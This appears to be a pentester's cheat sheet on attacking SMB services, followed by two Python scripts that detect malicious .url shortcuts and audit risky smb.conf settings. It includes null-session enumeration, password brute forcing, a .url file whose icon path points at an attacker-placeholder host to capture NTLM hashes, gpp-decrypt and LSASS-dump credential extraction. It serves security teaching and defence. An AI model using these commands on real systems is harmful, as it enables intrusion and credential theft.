Server Message Block

Footprinting The Service

Nmap

sudo nmap 10.129.14.128 -sV -sC -p139,445

RPCclient

rpcclient -U "" 10.129.14.128
rpcclient -U'%' 10.10.110.17
-U'%'    Explicitly sends an empty username and no password.
-N       Does not send any username or password, attempting to establish a null session.
Query                      Description
srvinfo                    Server information.
enumdomains                Enumerate all domains that are deployed in the network.
querydominfo               Provides domain, server, and user information of deployed domains.
netshareenumall            Enumerates all available shares.
netsharegetinfo <share>    Provides information about a specific share.
enumdomusers               Enumerates all domain users.
queryuser <RID>            Provides information about a specific user.

Search For Known SMB Version Vulnerabilities

Check For Shares Using Null Sessions

smbclient -N -L //$ip/
cme smb $ip --shares -u "guest" -p ""

Brute Forcing

cme smb $ip -u users.list -p pws.list --local-auth | grep '[+]'
If the target

URL File attacks

Test for URL file attacks by creating a file called "@somename.url" with the following contents, uploading it to a writable share, and spinning up an SMB server to capture the hash:

[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\EnterAttackerip\%USERNAME%.icon
IconIndex=1

Run Responder to capture hashes

/opt/Responder-3.1.3.0/Responder.py -I tun0
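The defender-side counterpart of the URL-file trick above, as an added example that is not code from the original notes: scan the files retrieved from a share for .url shortcuts whose IconFile or URL is a UNC path to a host outside the organisation's own file servers. TRUSTED_HOSTS and the sample share listing are constructed assumptions; the attacker host is the same placeholder the notes use.

```python
"""Scan share contents for .url files that point at untrusted SMB hosts.
Added example, not from the original notes; the allow-list and the sample
listing below are constructed."""
import configparser
import re

# Hosts that may legitimately serve icons over SMB (assumed allow-list).
TRUSTED_HOSTS = {"fileserver01", "fileserver01.corp.example"}

# Matches a UNC path (\\host\share...) and captures the host part.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")

# Constructed share listing: path -> file contents, as a scanner walking the
# share with smbmap/smbclient would retrieve them.
SAMPLE_FILES = {
    "notes\\@readme.url": (
        "[InternetShortcut]\n"
        "URL=blah\n"
        "WorkingDirectory=blah\n"
        "IconFile=\\\\ATTACKER-IP\\%USERNAME%.icon\n"   # placeholder host
        "IconIndex=1\n"
    ),
    "notes\\intranet.url": (
        "[InternetShortcut]\n"
        "URL=https://intranet.corp.example/\n"
        "IconFile=\\\\fileserver01\\icons\\web.ico\n"
    ),
    "notes\\report.txt": "quarterly numbers\n",
}


def unc_host(value):
    """Return the host of a UNC path, or None if the value is not UNC."""
    m = UNC_RE.match(value.strip())
    return m.group(1) if m else None


def suspicious_url_files(files):
    """Return (path, key, host) for every .url whose URL or IconFile points
    at an untrusted SMB host. Files that are not valid INI are skipped."""
    findings = []
    for path, content in files.items():
        if not path.lower().endswith(".url"):
            continue
        # interpolation=None so %USERNAME% is not treated as a format string
        cp = configparser.ConfigParser(interpolation=None, strict=False)
        try:
            cp.read_string(content)
        except configparser.Error:
            continue
        if not cp.has_section("InternetShortcut"):
            continue
        for key in ("url", "iconfile"):  # configparser lower-cases keys
            value = cp.get("InternetShortcut", key, fallback=None)
            host = unc_host(value) if value else None
            if host and host.lower() not in TRUSTED_HOSTS:
                findings.append((path, key, host))
    return findings


if __name__ == "__main__":
    for path, key, host in suspicious_url_files(SAMPLE_FILES):
        print(f"{path}: {key} references untrusted host {host}")
```

A .url whose icon lives on an unknown host is the thing to hunt for in writable shares; the legitimate intranet shortcut in the sample, whose icon sits on an allow-listed server, produces no finding.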

Read / Upload access

Attempt to download and view share contents using valid credential / anonymous login / null session

smbmap -H $ip
smbmap -H $ip -r

Using smbmap with the -r or -R (recursive) option, one can browse the directories.

Downloading:
smbmap -H 10.129.14.128 --download "notes\note.txt"

Uploading:
smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

Recursive listing of every share as the guest account:
smbmap -u guest -p "" -H $ip -A '.*' -R

Cpassword discovery

Search for "Groups.xml" and decrypt any cpassword value it contains:

gpp-decrypt <cpassword>

lsass.zip lsass.dmp

Search for lsass.zip or lsass.dmp; an LSASS memory dump can be parsed to dump credentials, keys and tickets:

pypykatz lsa minidump "lsass.zip"

Alternate Data Streams (ADS)

Test for alternate data streams after discovering 0-byte files (from within an smbclient session):

allinfo <filename>

Check Password Policy

cme smb $ip --pass-pol -u guest -p ""

User Discovery

Check for users using a valid credential / anonymous login / null session:

cme smb $ip --users -u guest -p ""
cme smb $ip --rid-brute -u guest -p ""

Group discovery

Check for groups using a valid credential / anonymous login / null session:

cme smb $ip --groups -u guest -p ""

Smbclient

Interactively access the SMB shares using smbclient:

smbclient //$ip/someshare -N
smbclient //$ip/someshare -U 'guest' -N
smbclient //$ip/someshare -U 'validuser%validpass'


Dangerous Settings

Setting                      Description
browseable = yes             Allow listing available shares in the current share?
read only = no               Forbid the creation and modification of files?
writable = yes               Allow users to create and modify files?
guest ok = yes               Allow connecting to the service without using a password?
enable privileges = yes      Honor privileges assigned to specific SID?
create mask = 0777           What permissions must be assigned to the newly created files?
directory mask = 0777        What permissions must be assigned to the newly created directories?
logon script = script.sh     What script needs to be executed on the user's login?
magic script = script.sh     Which script should be executed when the script gets closed?
magic output = script.out    Where the output of the magic script needs to be stored?
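An audit of an smb.conf against the settings in the table, as an added example that is not code from the original notes: a weak share definition is checked beside a hardened version of it. Both configs are constructed for illustration, and the predicates (which values count as dangerous, including the "writeable" spelling Samba also accepts) are this example's own choices.

```python
"""Audit a Samba smb.conf for the share settings in the table above.
Added example, not from the original notes; the two configs are constructed."""
import configparser


def _yes(v):
    return v in ("yes", "true", "1")


def _no(v):
    return v in ("no", "false", "0")


def _world_writable(v):
    """True when an octal mask grants write to 'others' (e.g. 0777, 0666)."""
    try:
        return int(v, 8) & 0o002 != 0
    except ValueError:
        return True  # an unparsable mask deserves a look too


# Setting -> predicate on its lower-cased value that marks it as dangerous.
DANGEROUS = {
    "browseable": _yes,
    "read only": _no,
    "writable": _yes,
    "writeable": _yes,          # Samba accepts both spellings
    "guest ok": _yes,
    "enable privileges": _yes,
    "create mask": _world_writable,
    "directory mask": _world_writable,
    "logon script": bool,       # any script configured is worth reviewing
    "magic script": bool,
    "magic output": bool,
}

# Constructed: one share with the table's risky values, one sensible share.
WEAK_CONF = """
[global]
workgroup = DEV

[notes]
path = /srv/notes
browseable = yes
read only = no
writable = yes
guest ok = yes
create mask = 0777
directory mask = 0777
magic script = script.sh
magic output = script.out

[tools]
path = /srv/tools
read only = yes
guest ok = no
create mask = 0644
"""

# Constructed: the same 'notes' share restricted to a group, read-only,
# not listed, and with masks that give no write bit to 'others'.
HARDENED_CONF = """
[global]
workgroup = DEV

[notes]
path = /srv/notes
browseable = no
read only = yes
guest ok = no
valid users = @notes
create mask = 0660
directory mask = 0770
"""


def audit_smb_conf(text):
    """Return (share, setting, value) for each dangerous setting found."""
    # interpolation=None: smb.conf values may contain %U-style variables
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    findings = []
    for share in cp.sections():
        for key, value in cp.items(share):
            check = DANGEROUS.get(key)
            if check is not None and check(value.strip().lower()):
                findings.append((share, key, value.strip()))
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        results = audit_smb_conf(conf)
        print(f"{name}: {len(results)} finding(s)")
        for share, key, value in results:
            print(f"  [{share}] {key} = {value}")
```

Run it against a real /etc/samba/smb.conf by passing the file's text to audit_smb_conf; every finding maps back to a row of the table, so the hardened block shows what the corrected values look like.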
